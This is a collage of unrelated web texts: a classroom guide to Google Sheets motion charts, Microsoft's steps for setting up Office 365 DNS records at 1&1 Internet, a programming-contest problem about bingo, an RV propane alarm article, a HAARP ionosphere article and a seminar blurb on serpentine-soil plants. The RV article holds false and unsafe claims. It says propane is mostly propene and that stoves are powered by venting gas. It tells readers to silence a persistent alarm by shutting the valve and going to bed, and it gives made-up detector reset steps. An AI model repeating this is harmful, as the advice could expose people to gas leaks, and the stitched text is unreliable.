data entry form has been created (ask your teacher for the link) to allow students to enter their own data, mix-and-match data categories and investigate a variety of motion graphics within a single spreadsheet. How To Display Data & Experiment with Motion Chart Display Settings Key: See numbered green arrows in screen-shot below The display can be manipulated using a wide range of settings as per green arrows in screen-grabs below. Fig 5. Example Eye Colour spreadsheet Customise graph settings by adjusting controls hi-lighted by green arrows (see above): KEY VALUES: Each number in list below, corresponds with a numbers on green arrows above. Each chart display can (and should be) be highly customised. 1. Select the type of chart displayed: Bubble, bar or zig-zag graph TAB options 2. Click to open display - The bar chart display can be customised when open 3. Click to open display - The line chart display can be customised when open 4. Choose how colours are allocated to the items displayed in chart (usually best to select 'Unique Colors') 5. Choose to display all bubbles same size or bubble size in proportion to selected value 6. Select one or more checkboxes to turn on/off various item information bubbles 7. Select 'trails' to leave a trail showing history (for animated charts only) 8. Display a trail of values plotted (in this example, for 'green' eye colour values). 9. Change displayed X axis scale between 'linear' or 'log' - Also select 'Time' as the value to display on X axis) 10. Set and freeze the time-line by dragging the play 'progress bar' (slider) left-right 11. Display the values that have been entered into the spreadsheet via the on-line form 12. Display the values that have been entered into the master spreadsheet (ABS CAS Data set) 13. Display 'Chart 1' (ABS Data Motion Chart) or 'Chart 2' (Motion Chart for student-entered data set) 14. An interactive slider button to right of Play button controls playback speed 15. Play or Pause Motion Chart animation 16. Select the data set to display on Y axis via the 'pullout' menu options (see item #9 to choose items displayed on X axis) 17. Display raw sheet value(s) when mouse over item (in this case, item #18) 18. Toggle X axis scale between 'linear' or 'log' Hover mouse over any of the settings - most (but not all) have some effect. Fig 6. Example Eye Colour spreadsheet Otionally, Students may use an on-line form to enter and analyse additional data that they may collect from the “Colour By Numbers” project. Students may elect to create their own, personal Motion Charts using an alternative data set (spreadsheet) of their own. Fig 4. Example Eye Colour spreadsheet Chart/options makes a huge difference to the understandibility of the display. For example, for “Top30 Countries” graph (above) it may not seem to make sense to display 'Persons' on both X and Y axis (also set 'Size'='Persons' and “Color'='Unique Color' and X axis scale to 'Log' instead of 'Lin'(ear))… but try it and see! Also, viewing the same data in different chart types will high-light different trends. Pre-test, Base-line Charts & Maths Quiz: Check out the “Colour By Numbers', Flipped Classroom Student Homework & Assessment Task (Google form-based Flubaroo quiz). Colour By Numbers - Data Entry Form For LabGroups: Check out the 'Colour By Numbers', Flipped Classroom maths project data entry form: For entering Labgroup data only. All of the on-line tools discussed here are designed and supported by third parties. Providing detailed instruction in the use of these tools is beyond the scope of this document Please refer to Goggle on-line knowledge base for more detail. The following data is technical only - It can be ignored. TechnoBabble: Other Chart Formats MORE BABBLE - ABSOLUTELY NOT WORTH READING BELOW HERE: Other Chart Formats Links Google Sheet Functions Eye Colour Motion Chart Configuration The Motion Chart plots change or trend over time. Eye colours do not change (much) over time, so we create a 'sequence' of events instead of 'times' of events. To do that, we create a function to create an event sequence (Class/Year numbers) into a time formatted column. =ARRAYFORMULA(D8:D500+2000) Each iteration of the results provides the number of a particular eye-colours found in a particular result set. These numbers will vary rather than trending. To provide some kind of meaningful information, all of the results are averaged and displayed in the final screen when the motion chart completes (the first seven rows of the sheet are reserved for 21015 entries - which are outside of form entry range. • We also “Freeze” the first eight rows - must freeze all rows that contain functions! • Format the TotalColour column to display 2 dec places =AVERAGE(FILTER(C8:C,A8:A="Blue")) =AVERAGE(FILTER(C8:C,A8:A="Brown")) =AVERAGE(FILTER(C8:C,A8:A="Green")) =AVERAGE(FILTER(C8:C,A8:A="Grey")) =AVERAGE(FILTER(C8:C,A8:A="Hazel")) =AVERAGE(FILTER(C8:C,A8:A="Other")) Fig 1 Sheet overview Fig 2 Sheet Column Numbering/Year Function Fig 3 Sheet Ey Colour Averaging Function Custom Spreadsheet Functions Google Spreadsheet functions list: https://support.google.com/docs/table/25273?hl=en Cumulatively sum only numbers that belong to a certain username (string) in a separate column? I'd like to use arrayformula so cells autofill with data without dragging formula manually. E.g. running total for user A: User Amount Running Total for A A 1 1 B 2 A 4 5 A 3 8 B 5 A 2 10 If the data starts in row 2, then try: =ArrayFormula(IF(A2:A="A",SUMIF(IF(A2:A="A",ROW(A2:A),ROWS(A:A)+1),"<="&ROW(A2:A),B2:B),)) Blue: =ArrayFormula(IF(D2:D="Blue",SUMIF(IF(D2:D="Blue",ROW(D2:D),ROWS(E:E)+1),"<="&ROW(D2:D),E2:E),)) Brown: =ArrayFormula(IF(D3:D="Brown",SUMIF(IF(D3:D="Brown",ROW(D3:D),ROWS(E:E)+1),"<="&ROW(D3:D),E3:E),)) Green: =ArrayFormula(IF(D4:D="Green",SUMIF(IF(D4:D="Green",ROW(D4:D),ROWS(E:E)+1),"<="&ROW(D4:D),E4:E),)) http://webapps.stackexchange.com/questions/69778/arrayformula-to-compute-running-average-for-groups-of-rows Brown: =SUM(FILTER(E:E,D:D="Brown")) Green: =SUM(FILTER(E:E,D:D="Green")) Charting Google Form Responses Base-line Assessment Form, Orientation & Homework Quiz http://www.makeuseof.com/tag/how-to-use-google-forms-to-create-your-own-self-grading-quiz/ Prepare a Google Form to provide an on-line assessment and self-grading quiz. The example quiz used the Google Sheet Add-On Flubaroo - A free tool that helps quickly grade multiple-choice and similar assignments: • Computes average assignment score. • Computes average score per question, and flags low-scoring questions. • Displays a grade distribution graph. • Option to email each student their grade, and an answer key. • Ability to send individualized feedback to each student. More detail is available on how to set up a Flubaroo quiz Google Form with Flubaroo Student Responses Fig. Google form with Student Response Sheet with Flubaroo Grades sheet Transpose Rows & Columns In LibreOffice Calc, there is a way to “rotate” a spreadsheet so that rows become columns and columns become rows. 1. Select the cell range that you want to transpose. 2. Choose Edit - Cut. 3. Click the cell that is to be the top left cell in the result. 4. Choose Edit - Paste Special. 5. In the dialog, mark Paste all and Transpose. 6. If you now click OK the columns and rows are transposed.     howtos/google/motion-charts.txt · Last modified: 01/02/2017/ 20:01 by 127.0.0.1
__label__pos
0.647025
Create DNS records at 1&1 Internet for Office 365 Caution: Note that 1&1 Internet doesn’t allow a domain to have both an MX record and a top-level Autodiscover CNAME record. This limits the ways in which you can configure Exchange Online for Office 365. There is a workaround, but we recommend employing it only if you already have experience with creating subdomains at 1&1 Internet. If despite this service limitation you choose to manage your own Office 365 DNS records at 1&1 Internet, follow the steps in this article to verify your domain and to set up DNS records for email, Skype for Business Online, and so on. These are the main records to add. Follow the steps below or watch the video(Need more help? Get support.) After you add these records at 1&1 Internet, your domain will be set up to work with Office 365 services. To learn about webhosting and DNS for websites with Office 365, see Use a public website with Office 365. Note:  Typically it takes about 15 minutes for DNS changes to take effect. However, it can occasionally take longer for a change you've made to update across the Internet's DNS system. If you’re having trouble with mail flow or other issues after adding DNS records, see Troubleshoot issues after changing your domain name or DNS records. Add a TXT record for verification Before you use your domain with Office 365, we have to make sure that you own it. Your ability to log in to your account at your domain registrar and create the DNS record proves to Office 365 that you own the domain. Note:  This record is used only to verify that you own your domain; it doesn’t affect anything else. You can delete it later, if you like. Follow the steps below or watch the video (start at 0:42). 1. To get started, go to your domains page at 1&1 Internet by using this link. You’ll be prompted to login. 1&1-BP-Configure-1-1 2. Choose Manage domains. 1&1-BP-Configure-1-2 3. On the Domain Center page, find the domain that you want to update, and then choose the Panel (v) control for that domain. 1&1-BP-Configure-1-3 4. In the Domain Settings area, choose Edit DNS Settings. 1&1-BP-Configure-1-4 5. In the TXT and SRV Records section, choose Add Record. (You may have to scroll down.) 1&1-BP-Configure-1-5 6. In the Add Record area, in the boxes for the new record, type or copy and paste the values from the following table. (Select the Type value from the drop-down list.) Type Prefix Name Value TXT (Leave this field empty.) MS=msXXXXXXXX Note: This is an example. Use your specific Destination or Points to Address value here, from the table in Office 365. How do I find this? 1&1-BP-Verify-1-1 7. Choose Save. 1&1-BP-Verify-1-2 8. Choose Save. 1&1-BP-Verify-1-3 9. In the Edit DNS Settings dialog box, choose Yes. 1&1-BP-Configure-3-16 10. Wait a few minutes before you continue, so that the record you just created can update across the Internet. Now that you've added the record at your domain registrar's site, you'll go back to Office 365 and request Office 365 to look for the record. When Office 365 finds the correct TXT record, your domain is verified. 1. Go to the Domains page. 2. On the Domains page, choose the domain that you are verifying. O365-BP-Verify-1-2 3. On the Setup page, choose Start setup. O365-BP-Verify-1-3 4. On the Verify domain page, choose Verify. O365-BP-Verify-1-4 Note:  Typically it takes about 15 minutes for DNS changes to take effect. However, it can occasionally take longer for a change you've made to update across the Internet's DNS system. If you’re having trouble with mail flow or other issues after adding DNS records, see Troubleshoot issues after changing your domain name or DNS records. Back to top Add an MX record so email for your domain will come to Office 365 Follow the steps below or watch the video (start at 3:22). 1. To get started, go to your domains page at 1&1 Internet by using this link. You’ll be prompted to login. 1&1-BP-Configure-1-1 2. Choose Manage domains. 1&1-BP-Configure-1-2 3. On the Domain Center page, find the domain that you want to update, and then choose the Panel (v) control for that domain. 1&1-BP-Configure-1-3 4. In the Domain Settings area, choose Edit DNS Settings. 1&1-BP-Configure-1-4 5. In the MX Records section, in the Mail Exchanger (MX Record) area, select Other mail server. (You may have to scroll down.) 1&1-BP-Configure-2-1 6. If there are any MX records already listed, delete each of them by selecting the record and then pressing the Delete key on your keyboard. (If there are no MX records already listed, continue to the next step.) 1&1-BP-Configure-2-2 7. In the boxes for the MX 1 record, type or copy and paste the values from the following table. MX 1 Priority <domain-key>.mail.protection.outlook.com Note: Get your <domain-key> from your Office 365 portal account. How do I find this? 10 For more information about priority, see What is MX priority? 1&1-BP-Configure-2-3 8. Choose Save. (You may have to scroll down.) 1&1-BP-Configure-2-4 9. In the Edit DNS Settings dialog box, choose Yes. 1&1-BP-Configure-3-16 Back to top Add the six CNAME records that are required for Office 365 1&1 Internet requires a workaround so that you can use an MX record together with the CNAME records that are required for Office 365 email services. This workaround requires you to create a set of subdomains at 1&1 Internet, and to assign them to CNAME records. Important: Make sure that you have at least two available subdomains before starting this procedure. We recommend this solution only if you already have experience with creating subdomains at 1&1 Internet. Back to top Basic CNAME records Follow the steps below or watch the video (start at 3:57). 1. To get started, go to your domains page at 1&1 Internet by using this link. You’ll be prompted to login. 1&1-BP-Configure-1-1 2. Choose Manage domains. 1&1-BP-Configure-1-2 3. On the Domain Center page, find the domain that you want to update and then choose Manage Subdomains. 1&1-BP-Configure-3-0 Now you’ll create two subdomains and set an Alias value for each. (This is required because 1&1 Internet supports only one top-level CNAME record, but Office 365 requires several CNAME records.) First, you’ll create the Autodiscover subdomain. 4. In the Subdomain Overview section, choose Create Subdomain. 1&1-BP-Configure-3-1 5. In the Create Subdomain box for the new subdomain, type or copy and paste only the Create Subdomain value from the following table. (You'll add the Alias value in a later step.) Create Subdomain Alias autodiscover autodiscover.outlook.com 1&1-BP-Configure-3-2 6. Choose Create Subdomain. 1&1-BP-Configure-3-3 7. In the Subdomain Overview section, locate the autodiscover subdomain that you just created, and then choose the Panel (v) control for that subdomain. 1&1-BP-Configure-3-4 8. In the Subdomain Settings area, choose Edit DNS Settings. 1&1-BP-Configure-3-5 9. In the A/AAAA Records (IP Addresses) section, in the IP address (A Record) area, select CNAME. 1&1-BP-Configure-3-6 10. In the Alias: box, type or copy and paste only the Alias value from the following table. Create Subdomain Alias autodiscover autodiscover.outlook.com 1&1-BP-Configure-3-7 11. Select the check box for the I am aware disclaimer. 1&1-BP-Configure-3-8-1 12. Choose Save. 1&1-BP-Configure-3-8-2 13. In the Edit DNS Settings dialog box, choose Yes. 1&1-BP-Configure-3-16 Now you'll create the second subdomain. 14. In the Subdomain Overview section, choose Create Subdomain. 1&1-BP-Configure-3-9 15. In the Create Subdomain box for the new subdomain, type or copy and paste only the Create Subdomain value from the following table. (You'll add the Alias value in a later step.) Create Subdomain Alias msoid clientconfig.microsoftonline-p.net 1&1-BP-Configure-3-10 16. Choose Create Subdomain. 1&1-BP-Configure-3-11 17. In the Subdomain Overview section, find the msoid subdomain that you just created, and then choose the Panel (v) control for that subdomain. 1&1-BP-Configure-3-12 18. In the Subdomain Settings area, choose Edit DNS Settings. 1&1-BP-Configure-3-13 19. In the A/AAAA Records (IP Addresses) section, in the IP address (A Record) area, select CNAME. 1&1-BP-Configure-3-14-1 20. In the Alias: box, type or copy and paste only the Alias value from the following table. Create Subdomain Alias msoid clientconfig.microsoftonline-p.net 1&1-BP-Configure-3-14-2 21. Select the check box for the I am aware disclaimer. 1&1-BP-Configure-3-15-1 22. Choose Save. 1&1-BP-Configure-3-15-2 23. In the Edit DNS Settings dialog box, choose Yes. 1&1-BP-Configure-3-16 Additional CNAME records The additional CNAME records created in the following procedure enable Skype for Business Online services. You will employ the same steps that you used to create the two CNAME records you have already created. 1. Create the third subdomain (Lyncdiscover). On the Subdomain Overview section, choose Create Subdomain. 2. In the Create Subdomain box for the new subdomain, type or copy and paste only the Create Subdomain value from the following table. (You'll add the Alias value in a later step.) Create Subdomain Alias lyncdiscover webdir.online.lync.com 3. Choose Create Subdomain. 4. On the Domain Center page, choose Manage Subdomains. 5. In the Subdomain Overview section, find the lyncdiscover subdomain that you just created, and then choose the Panel (v) control for that subdomain. In the Subdomain Settings area, choose Edit DNS Settings. 6. In the A/AAAA Records (IP Addresses) section, in the IP address (A Record) area, select CNAME. 7. In the Alias: box, type or copy and paste only the Alias value from the following table. Create Subdomain Alias lyncdiscover webdir.online.lync.com 8. Select the check box for the I am aware disclaimer, and then choose Save. 9. In the Edit DNS Settings dialog box, choose Yes. 10. Create the fourth subdomain (SIP): In the Subdomain Overview section, choose Create Subdomain. 11. In the Create Subdomain box for the new subdomain, type or copy and paste only the Create Subdomain value from the following table. (You'll add the Alias value in a later step.) Create Subdomain Alias sip sipdir.online.lync.com 12. Choose Create Subdomain. 13. On the Domain Center page, choose Manage Subdomains. 14. In the Subdomain Overview section, find the sip subdomain that you just created, and then choose the Panel (v) control for that subdomain. In the Subdomain Settings area, choose Edit DNS Settings. 15. In the A/AAAA Records (IP Addresses) section, in the IP address (A Record) area, select CNAME. 16. In the Alias: box, type or copy and paste only the Alias value from the following table. Create Subdomain Alias sip sipdir.online.lync.com 17. Select the check box for the I am aware disclaimer, and then choose Save. 18. In the Edit DNS Settings dialog box, choose Yes. CNAME records needed for MDM Important: Follow the procedure that you used for the other four CNAME records, but supply the values from the following table. Create Subdomain Alias enterpriseregistration enterpriseregistration.windows.net enterpriseenrollment enterpriseenrollment.manage.microsoft.com Back to top Add a TXT record for SPF to help prevent email spam Important: You cannot have more than one TXT record for SPF for a domain. If your domain has more than one SPF record, you'll get email errors, as well as delivery and spam classification issues. If you already have an SPF record for your domain, don't create a new one for Office 365. Instead, add the required Office 365 values to the current record so that you have a single SPF record that includes both sets of values. Need examples? Check out these details and sample SPF records. To validate your SPF record, you can use one of these SPF validation tools. Follow the steps below or watch the video (start at 5:09). 1. To get started, go to your domains page at 1&1 Internet by using this link. You’ll be prompted to login. 1&1-BP-Configure-1-1 2. Choose Manage domains. 1&1-BP-Configure-1-2 3. On the Domain Center page, find the domain that you want to update, and then choose the Panel (v) control for that domain. 1&1-BP-Configure-1-3 4. In the Domain Settings area, choose Edit DNS Settings. 1&1-BP-Configure-1-4 5. In the TXT and SRV Records section, choose Add Record. (You may have to scroll down.) 1&1-BP-Configure-1-5 6. In the Add Record area, in the boxes for the new record, type or copy and paste the values from the following table. (Select the Type value from the drop-down list.) Type Prefix Name Value TXT (Leave this field empty.) v=spf1 include:spf.protection.outlook.com -all Note: We recommend copying and pasting this entry, so that all of the spacing stays correct. TXT record 7. Choose Save. Add record 8. Choose Save. Save record 9. In the Edit DNS Settings dialog box, choose Yes. 1&1-BP-Configure-3-16 Back to top Add the two SRV records that are required for Office 365 Follow the steps below or watch the video (start at 5:51). 1. To get started, go to your domains page at 1&1 Internet by using this link. You’ll be prompted to login. 1&1-BP-Configure-1-1 2. Choose Manage domains. 1&1-BP-Configure-1-2 3. On the Domain Center page, find the domain that you want to update, and then choose the Panel (v) control for that domain. 1&1-BP-Configure-1-3 4. In the Domain Settings area, choose Edit DNS Settings. 1&1-BP-Configure-1-4 5. In the TXT and SRV Records section, choose Add Record. (You may have to scroll down.) 1&1-BP-Configure-1-5 6. Add the first of the two SRV records. In the Add Record area, in the boxes for the new record, type or copy and paste the values from the first row in the following table. (Select the Type and TTL values from the drop-down list.) Type Service Protocol Name Host Priority Weight Port TTL SRV sip tls (Leave this field empty.) sipdir.online.lync.com 100 1 443 3600 (1 h) SRV sipfederationtls tcp (Leave this field empty.) sipfed.online.lync.com 100 1 5061 3600 (1 h) 1&1-BP-Configure-5-1 7. Choose Save. 1&1-BP-Configure-5-2 8. Choose Save. 1&1-BP-Configure-5-3 9. In the Edit DNS Settings dialog box, choose Yes. 1&1-BP-Configure-3-16 10. Add the other SRV record. In the TXT and SRV Records section, choose Add Record. In the Add Record area, create a record using the values from the other row in the table, and then again choose Add, Save, and Yes to complete the record. Note:  Typically it takes about 15 minutes for DNS changes to take effect. However, it can occasionally take longer for a change you've made to update across the Internet's DNS system. If you’re having trouble with mail flow or other issues after adding DNS records, see Troubleshoot issues after changing your domain name or DNS records. Back to top Still need help? Get help from the Office 365 community forums Admins: Sign in and create a service request Admins: Call Support Back to top Share Facebook Facebook Twitter Twitter Email Email Was this information helpful? Great! Any other feedback? How can we improve it? Thank you for your feedback! ×
__label__pos
0.801465
D. Bingo! time limit per test 1 second memory limit per test 256 megabytes input standard input output standard output The game of bingo is played on a 5 × 5 square grid filled with distinct numbers between 1 and 75. In this problem you will consider a generalized version played on an n × n grid with distinct numbers between 1 and m (m ≥ n2). A player begins by selecting a randomly generated bingo grid (generated uniformly among all available grids). Then k distinct numbers between 1 and m will be called at random (called uniformly among all available sets of k numbers). For each called number that appears on the grid, the player marks that cell. The score at the end is 2 raised to the power of (number of completely marked rows plus number of completely marked columns). Determine the expected value of the score. The expected score may be very large. If the expected score is larger than 1099, print 1099 instead (for example as "1e99" without the quotes). Input Input will consist of three integers n, m, k (1 ≤ n ≤ 300; n2 ≤ m ≤ 100000; n ≤ k ≤ m). Output Print the smaller of 1099 and the expected score. Your answer must be correct within an absolute or relative error of 10 - 9. Examples Input 1 2 1 Output 2.5 Input 2 4 3 Output 4 Input 7 59164 40872 Output 3.1415926538
__label__pos
0.982006
[FIXED] Propane Alarm In Your RV Why is my propane alarm going off in my RV? Why is my propane alarm going off in my RV? Your RV propane system has a leak, or is not sealed properly. First turn off the gas at the tank and go outside to investigate that your connections are tight and nothing is leaking onto the ground. Make sure you have no gas inside of your coach. You should NEVER ignore a propane alarm going off! If it doesn’t stop after about 45 seconds, get out of your RV immediately and don’t look back until someone tells you everything is safe again. Some common problems: A crack in a pipe joint seal such as where a pipe enters into an expansion valve may cause the alarm activation. The crack will likely be gas filled. If the leak is in the vapor line, a slight amount of water or propane can cause a large release which multiplies the effect of the leak and creates a greater than normal volume of hydrocarbon gas seeping into your coach. The repair will require replacing part(s) that have cracks and/or resealing joints where cracking was found. How does my RV’s Propane system work? When you turn on your propane range, oven or cooktop burner – “propane” (technically it is actually mostly propene) entering through an intake regulator gets mixed with air before being ignited by an electric solenoid valve to create heat for cooking. This same gas then travels out of your RV through the open pipe in the stove (that you stick a match into when lighting) and eventually vents out of a vent pipe on the roof somewhere. The gas that is vented off from inside your RV is not really propane or propene anymore – it’s mostly water vapor at this point. This venting process is how your range, oven, cooktop or microwave get their power for ignition because there are no batteries involved with these cooking appliances. This same flow of gas also goes to an outside tank that feeds all of the other appliances in your RV such as: refrigerator, furnace blower motor, furnace blower fan (forced air heat), hot water heater, etc. As needed by these appliances, they all have separate gas valves to direct the flow of gas into their respective systems. There are also two type of propane appliances in your RV: storage and demand devices. Storage devices will hold a considerable amount of gas and use it up over time while demand burners, such as your furnace blower motor or your hot water heater, only need a bit of gas at a time so normally these have an open flame switch that turns on the flow for the exact amount needed at any given time (this is how you can tell if your hot water heater has been releasing small amounts of gas intermittently). These appliances would NOT require any vented pipe connection because they use very minimal amounts of propane quickly whenever they need it.  The propane tank(s) in your RV are usually located under the rear most portion of your coach and may have one or more tanks if you have a large enough rig. Some people opt to install two tanks – one inside of the coach and another outside, just in case there is a leak in the line between the two. The gas from your propane tank(s) is delivered through a pressure regulator (the same kind used for natural gas) that reduces the system pressure to less than 10 psi. The gas then goes into an expansion valve that blows off any excess water vapor that has accumulated at this lower pressure setting. T Alert RV propane gas How do you reset the Safe T Alert RV propane gas detector? Step 1: If the Safe T Alert RV propane gas detector is in an area without any propane gas, set the detector to “HIGH STANDARD (5x)” by depressing the top button for a few seconds and then setting it to “HIGH STANDARD” with a downward press. Step 2: If the Safe T Alert RV propane gas detector is in an area with propane gas, set the detector to “LOW STANDARD (1x)” by depressing the top button for a few seconds and then setting it to “LOW STANDARD” with a downward press. Step 3: Press the down arrow until “RESET” is selected and then press the top button. The default reset time is set to 30 seconds, but it can be adjusted between 5 and 60 seconds by pressing the left or right arrows respectively. If using a lower number (5) there will be less of a response time, while higher values (60) allow for longer alarm times. When the desired value is displayed, press the top button again to confirm your selection. Step 4: A series of dots will appear on the display to indicate that a new alarm has been entered and you may choose another reset duration by following steps 2-3 above. To accept these changes activate step 1 again after making changes if necessary. Step 5: The Safe T Alert RV propane gas detector will now enter alarm mode immediately and will reset itself after the selected time passes. How do I stop my RV propane alarm from beeping? This can be accomplished by turning off the propane gas valve on the RV. The alarm should stop beeping when this is done. To turn off the propane gas valve, follow these steps: 1. Find the propane supply tank on your RV and open it up (usually there is a hose that can be detached from the top of the tank). You should see either an off/on switch or a large knob with an “OFF” label on it. The switch usually has two settings, one marked “ON” and another one marked “AUTO”. In order to shut off the alarm, you have to turn this knob or push this button into the “OFF” position. Make sure that you turn OFF only THE PROPANE GAS TANK and not one of your stove burners for example! 2. Close up the propane supply tank. 3. The propane gas alarm should stop beeping now and you can go to bed. Remember to turn on the supply tank again in the morning before you make that coffee! Note: If your orange RV propane gas alarm won’t stop beeping after turning off the propane gas valve, then it is probably an electrical noise issue related to a ground loop or something similar. Unfortunately, there is not much you can do about such things besides moving your RV around so that this annoying electronic noise stops following you around everywhere! What can set off a propane detectors? 1. Acetylene torches 2. Acids 3. Alcohols, such as ethanol and methanol 4. Ammonia, bleach, biological detergents (soaps), cleaning fluids and solutions containing ammonia or chlorine 5. Antifreeze products – Ethylene glycol antifreezes can damage a gas detector unit because of their high alcohol content 6. Hair Spray 7. Cleaning chemicals When should you clean your propane detector? It is recommended to clean your propane detector once a week when full time camping and monthly when you are a weekend camper. [catlist id=13] RCT We own and operate multiple camping and RV Trailer site. Its our passion to see the world thru camping and traveling. There is no bigger pleasure for us then to share with you our readers our experience in RV Travels and Camping. Leave a Reply Your email address will not be published. Recent Content
__label__pos
0.982559
HAARP, the most powerful ionosphere heater on Earth Last Updated: February 6, 2024By HAARP, the most powerful ionosphere heater on Earth When stimulated with high-intensity radio waves, the ionosphere responds with baffling and beautiful displays. Our modern world of Wi-Fi, smartphones, and location apps relies on radio waves to link up all our gadgets. Most of us, though, are unaware that the ionosphere high above Earth affects the location services in our phones and the directions relayed by the navigation units in our cars. The complex dynamics of the ionospheric plasma, a gas of electrons and ions enveloping our planet, can be studied by research facilities such as the High Frequency Active Auroral Research Program (HAARP), located in Alaska. During the past 15 years, HAARP has produced many interesting and unexpected results, perhaps most spectacularly the production of an artificial ionospheric plasma generated by radio waves. The ionosphere is the region of the upper atmosphere characterized by a large population of free electrons and ions—the atmospheric shrapnel that arises when UV photons from the Sun knock electrons from atmospheric gas. (For a tour of the upper atmosphere, see the Quick Study by John Emmert, Physics Today, December 2008, page 70.) Its density is controlled by the relative rates of ion production and the recombination of ions with electrons to re-create neutral molecules. The ionosphere begins at an altitude of about 70 km, reaches a peak daytime density of something like a million particles per cubic centimeter near 250 km, and tapers off above that altitude to blend into the much more rarefied plasmasphere, magnetosphere, and solar wind. The ionospheric plasma can distort and delay satellite communications and navigation signals passing through it; indeed, the primary practical motivation for studying the ionosphere is to get a handle on those effects. At the low power of day-to-day devices, the ionospheric plasma can alter radio waves, but the plasma itself is unaffected. At high enough power densities, however, radio waves can affect the plasma and generate feedback between the waves and plasma, a phenomenon that offers a unique means—so-called ionospheric heating—of studying the ionosphere. The HAARP facility began operating in 1999 with a 6 × 8 array of transmitting antennas that, in total, produced 960 kW of RF power—about the same as generated by 10 AM radio stations. (The figure shows today’s 12 × 15 array.) The HAARP beam is broad like a flashlight’s, not narrow like a laser’s, but it can be electronically steered anywhere within 30° of zenith—that is, local vertical—and it can operate at 3–10 MHz. Its powerful radio waves drive ionospheric electrons back and forth in what are called plasma waves. As those driven electrons collide with each other and with background species, their temperature goes up, which is why HAARP is called a heater. Heating and observing the ionosphere. Generators at the High Frequency Active Auroral Research Program (HAARP) operations center in Alaska (buildings to the upper left) feed power to the large antenna array to the right. That array, in turn, transmits RF waves that interact with the ionosphere. Shelters down the road from the array house optical instruments for observing the resulting excitations; one of the instruments is visible through the clear dome in the lower inset. (Backdrop photo by A. Lee Snyder; inset photo by Robert Esposito.) The red and green regions in the upper inset (courtesy of Jeffrey Holmes) represent regions of the ionosphere in which oxygen atoms excited by ionospheric heating relax to lower-energy states. Behind the HAARP site rises Mount Drum. Just as an opera soprano needs to sing at just the right frequency to break a glass, so a heater must target frequencies that match the natural plasma resonances in the ionosphere. Primary targets include the plasma frequency, a function of electron density; multiples of the cyclotron frequency of electrons spiraling around the magnetic field; and hybrid resonances that combine those fundamental frequencies. Measurements of optical emissions excited by heated electrons yielded HAARP’s first unexpected result. Spotting such emissions at all was a feat, inasmuch as 20 years of attempts to do so at the EISCAT (European Incoherent Scatter) heater in Norway’s Arctic had been unsuccessful; in fact, HAARP scientists had been warned that looking for optical emissions would be a waste of time. Nevertheless, images recording the red 630.0-nm oxygen line revealed a faint blob turning on and off in sync with the heater; that could only mean HAARP had heated the electrons and excited the oxygen. The airglow showed an unexpected enhancement well away from the beam center, at the magnetic zenith—that is, the direction of the magnetic field. The obvious next step was to point the beam toward the magnetic zenith, which at HAARP is about 15° south-southwest of vertical. When the experiment was finally performed in 2002, as the HAARP array swung the beam through the magnetic zenith, the blob lit up and was 10 times as bright as airglow in any other location. A variation of that magnetic zenith effect had been previously observed at EISCAT, but neither the EISCAT nor HAARP version of the effect had been predicted and neither is fully understood. Thanks to its frequency agility, the HAARP antenna can heat the ionosphere at specific altitudes where the transmission frequency simultaneously matches two resonances. In 2004, experiments exploiting that possibility produced green-line oxygen emissions at 557.7 nm. (The figure shows an airglow with red and green oxygen emission.) Those lines come from an excited state with an energy 4 eV above the ground-state energy; evidently, by “surfing” plasma waves, the electrons accelerated to energies well beyond the thermal energy. Another HAARP experiment in the same series heated an ephemeral ionospheric layer produced by an aurora; the resulting green spots were as bright as the aurora itself. Those extremely bright spots have since been reproduced but are not yet explained. In 2007 HAARP expanded to its full design capability of 12 × 15 antennas and 3.6 MW of total power. During its first postexpansion science campaign, in February 2008, my colleagues and I obtained optical images with strange, unpredicted rings around the airglow spot. We hypothesized that if the plasma in the center of the beam were slightly enhanced in density relative to the background ionosphere, the density gradient could divert rays away from the center of the beam toward the location where the ring was observed. Careful examination of echoes from radio waves bounced off the ionosphere turned up evidence for a density-enhancing artificial plasma layer just below the natural ionosphere. Moreover, simulations of RF waves propagating through the observed layer put additional power right where the rings were seen. We had not expected such artificial ionization to be possible, but we followed up with new experiments designed to optimize ionization production. In March 2009, just over 10 years after we were told that looking for airglow was futile, I stepped outside with a couple of coworkers during an ionization experiment and marveled at the light—visible with unaided eyes—from an artificial ionospheric plasma produced and sustained by radio waves transmitted from the ground. In addition to generating unexpected phenomena, HAARP scientists used and further developed a diagnostic technique pioneered at EISCAT: stimulated electromagnetic emissions. The effect arises when plasma waves stimulated by the heater regenerate radio waves that are received on the ground as a complex spectrum of narrow peaks and broad bumps on either side of the transmission frequency. Some of those depend not only on electron density but also on ion mass, magnetic field strength, or other parameters. Thus the stimulated emissions provide a potentially powerful tool for analyzing conditions in the heated volume. Admittedly, research at HAARP has not directly contributed to new corrections for ionospheric effects on navigation or communications systems. Instead, the many surprises encountered in HAARP experiments have made abundantly clear the need for quantitative predictive theory and modeling in the field of high-power RF-wave propagation. The complex equations describing plasma waves imply a whole zoo of wave modes that could potentially be excited by a transmitter. But no one can predict with certainty whether a particular wave mode will absorb half the transmitted energy or only one part in a million. For example, observed artificial plasma production accounts for only about 5% of the energy available from the beam; some of the remaining 95% undoubtedly excites other modes that might mislead researchers into wrongly identifying the cause of the ionization. Stimulated electromagnetic emissions hold the greatest promise for helping scientists determine which wave modes are active during actual experiments. An interesting and still unexplored aspect of artificial ionization is the complex interplay between the plasma created by radio waves and the bending or reflecting of radio waves by that plasma. As food for thought, have a look at the video that accompanies the online version of this Quick Study. You’ll see a wide range of spots, turbulence, and sharp gradients—despite the smoothly varying beam. If we are ever to develop practical applications of heating technology, we’ll need to find mathematical solutions describing the evidently complex feedback process. In August 2015 the HAARP facility was transferred from the US Air Force to the University of Alaska so that HAARP scientists could continue their investigations of fundamental plasma physics in an academic environment. editor's pick latest video
__label__pos
0.783224
Loading Events This event has passed. alan pepper out in a field with plants to collect Alan Pepper Department of Biology, TAMU Title: “Between a rock and a hard place: Evolutionary adaptation to an extreme terrestrial environment” Abstract: Evolutionary adaptation to environment is a fundamental attribute of all living things. Because plants are sessile (immobile), they cannot seek out a new environment in the face of challenging conditions, and thus make excellent organisms for both laboratory and field studies of environmental adaption. The focus of my lab is the study of the genetic mechanisms of plant adaptation to ultramafic or ‘serpentine’ geological outcrops. Derived from highly unusual surface exposures of the Earth’s mantle, serpentine outcrops are globally rare, and are characterized by high levels of toxic heavy metals such as nickel, chromium and cobalt. They also have very low levels of essential mineral nutrients including nitrogen, phosphorous, potassium, calcium and sulfur. The resulting ‘serpentine barrens’ also have low levels of organic matter and are prone to drought. Only a very few plants have evolved to thrive in these conditions. In this seminar I will a describe a highly- tractable model system built from two ecologically contrasting populations of the rare annual plant Caulanthus 